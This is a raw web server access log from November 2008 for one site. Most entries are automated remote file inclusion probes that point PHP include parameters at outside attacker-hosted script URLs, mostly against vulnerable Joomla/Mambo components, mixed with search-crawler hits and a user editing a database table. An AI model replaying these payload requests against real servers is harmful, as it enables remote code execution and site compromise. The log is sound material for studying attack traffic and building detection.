80.13.217.217 - - [04/Nov/2008:08:59:57 -0800] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:09:00:17 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:09:00:18 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:00:42 -0800] "GET /logs/access_080311.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:00:43 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:00:43 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:00:47 -0800] "GET /logs/access_080810.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:07 -0800] "GET /logs/access_080305.log/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:07 -0800] "GET /logs/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:09 -0800] "GET /index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 200 94875 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:01:17 -0800] "GET /logs/access_080124.log/errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:01:27 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:01:27 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:40 -0800] "GET /logs/access_080305.log/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:40 -0800] "GET /logs/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:42 -0800] "GET /index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 200 94891 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:01:49 -0800] "GET /logs/access_080320.log/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:09:01:59 -0800] "GET /inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:09:01:59 -0800] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:02:08 -0800] "GET /logs/access_071217.log//ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:02:09 -0800] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:02:09 -0800] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:09:02:11 -0800] "GET /logs/access_080621.log%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:02:12 -0800] "GET /logs/access_071217.log//ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:02:12 -0800] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:02:13 -0800] "GET /logs//ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:02:22 -0800] "GET /logs/access_080320.log/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:02:29 -0800] "GET /logs/access_080101.log/errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
161.58.192.164 - - [04/Nov/2008:09:02:29 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
161.58.192.164 - - [04/Nov/2008:09:02:31 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:02:34 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:02:35 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:02:38 -0800] "GET /logs/access_080824.log/errors.php?error=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:02:38 -0800] "GET /logs/errors.php?error=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:02:38 -0800] "GET /errors.php?error=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:02:38 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.37.182 - - [04/Nov/2008:09:02:45 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.214.37.182 - - [04/Nov/2008:09:02:47 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://bentahan.com.ph//stores/bot.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
65.55.211.27 - - [04/Nov/2008:09:02:49 -0800] "GET /bikes/dteel/2008_07_20/?N=D HTTP/1.1" 200 2262 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:09:03:17 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:09:03:17 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.50.92.141 - - [04/Nov/2008:09:03:34 -0800] "GET /logs/access_080901.log HTTP/1.1" 200 851968 "http://search.yahoo.com/search?p=www.coveringspr.com&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:03:55 -0800] "GET /logs/access_080208.log//?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:03:57 -0800] "GET /?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 94718 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:03:59 -0800] "GET /logs//?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 200 72168 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:09:04:20 -0800] "GET /logs/access_071229.log/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:09:04:20 -0800] "GET /logs/access_071229.log/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:04:37 -0800] "GET /logs/access_080609.log/port.php?content=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:04:38 -0800] "GET /port.php?content=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:04:38 -0800] "GET /logs/port.php?content=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:04:38 -0800] "GET /logs/access_071201.log/port.php?content=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.98.70.18 - - [04/Nov/2008:09:04:40 -0800] "GET /logs/access_080917.log/?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.70.18 - - [04/Nov/2008:09:04:41 -0800] "GET /?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 200 94704 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.70.18 - - [04/Nov/2008:09:04:46 -0800] "GET /logs/?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 200 72163 "-" "libwww-perl/5.810" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:09:06:02 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:09:06:02 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:09:06:03 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:09:06:11 -0800] "GET /bikes/dteel/DesertSTOC07/?S=A HTTP/1.0" 200 7603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:06:37 -0800] "GET /logs/access_080309.log%20/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:09:06:45 -0800] "GET /logs/access_080404.log//?basepath=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.30 - - [04/Nov/2008:09:06:51 -0800] "GET /bikes/dteel/EQ2/Screenshots/ HTTP/1.1" 200 7116 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:09:06:59 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=632 HTTP/1.1" 200 7603 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:09:07:00 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:09:07:01 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:09:07:07 -0800] "GET /logs/access_080525.log/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:09:07:07 -0800] "GET /errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:09:07:07 -0800] "GET /logs/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:09:07:12 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=632 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=632" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:09:07:12 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=632&just_updated=1 HTTP/1.1" 200 7645 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=632" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:09:07:14 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=632&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:09:07:16 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32964 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
68.8.254.30 - warboard [04/Nov/2008:09:07:17 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33121 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "www.dmulk.com"
218.145.65.133 - - [04/Nov/2008:09:07:18 -0800] "GET /logs/access_080303.log/errors.php?error=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.31.187.62 - - [04/Nov/2008:09:07:21 -0800] "GET /logs/access_080309.log%20/index.php?spid=http://www.fileden.com/files/2008/10/15/2144788/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.70.18 - - [04/Nov/2008:09:07:26 -0800] "GET /logs/access_081009.log/?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:07:46 -0800] "GET /logs/access_080906.log//ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:07:49 -0800] "GET /logs/access_080906.log//ray/modules/global/inc/header.inc.php?sIncPath=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:09:01 -0800] "GET /logs/access_080307.log/claroline/inc/claro_init_header.inc.php?includePath=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:09:01 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:09:02 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
65.55.211.30 - - [04/Nov/2008:09:09:08 -0800] "GET /?show=gallery&pageid=17&nggpage=6 HTTP/1.1" 200 145725 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [04/Nov/2008:09:09:10 -0800] "GET /bikes/dteel/2008_09_05/?D=D HTTP/1.1" 200 1694 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:09:09:13 -0800] "GET /logs/access_080901.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:09:09:43 -0800] "GET /logs/access_080212.log%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.178.98 - - [04/Nov/2008:09:10:05 -0800] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://208.57.132.68/renovt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:09:10:10 -0800] "GET /logs/access_080307.log/claroline/inc/claro_init_header.inc.php?includePath=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:09:10:10 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:09:10:11 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:11:18 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:11:18 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:11:18 -0800] "GET /logs/access_080510.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:09:11:25 -0800] "GET /logs/access_080106.log/claroline/inc/claro_init_header.inc.php?includePath=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:11:27 -0800] "GET /logs/access_080917.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:12:01 -0800] "GET /logs/access_080610.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:12:01 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:09:12:01 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:12:37 -0800] "GET /logs/access_080610.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:12:38 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:09:12:39 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.37 - - [04/Nov/2008:09:12:49 -0800] "GET /logs/access_080709.log HTTP/1.1" 200 0 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
208.80.194.30 - - [04/Nov/2008:09:13:07 -0800] "GET / HTTP/1.0" 200 94148 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; yie6_SBC; SV1)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:13:19 -0800] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:13:19 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:09:13:19 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:09:13:20 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:09:13:22 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:09:13:37 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:09:13:37 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:09:13:37 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:09:14:00 -0800] "GET /logs/sunshop/index.php?action=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:09:14:00 -0800] "GET /sunshop/index.php?action=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.106.243.160 - - [04/Nov/2008:09:14:38 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
